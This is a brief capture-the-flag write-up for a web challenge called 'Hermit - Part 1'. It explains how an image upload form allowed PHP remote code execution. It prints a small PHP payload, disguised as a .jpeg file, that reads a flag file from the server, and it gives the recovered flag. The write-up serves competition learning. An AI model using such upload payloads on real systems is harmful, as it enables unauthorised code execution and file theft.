Hermit - Part 1
Category: web
50 points
Help henry find a new shell
http://104.197.195.221:8086 http://34.121.84.161:8086
Created by Cobchise#6969
Hint: How do you know a file is an image?
Solution
Challenge is about PHP remote code execution. Under given address there’s a webpage with “image” upload ;-)
I messed around for a while on the system to finally prepare ugabuga.jpeg with below content and get the flag.
<?php
$filestring = file_get_contents('/home/hermit/flag/userflag.txt');
print $filestring;
?>
Flag
UMASS{a_picture_paints_a_thousand_shells}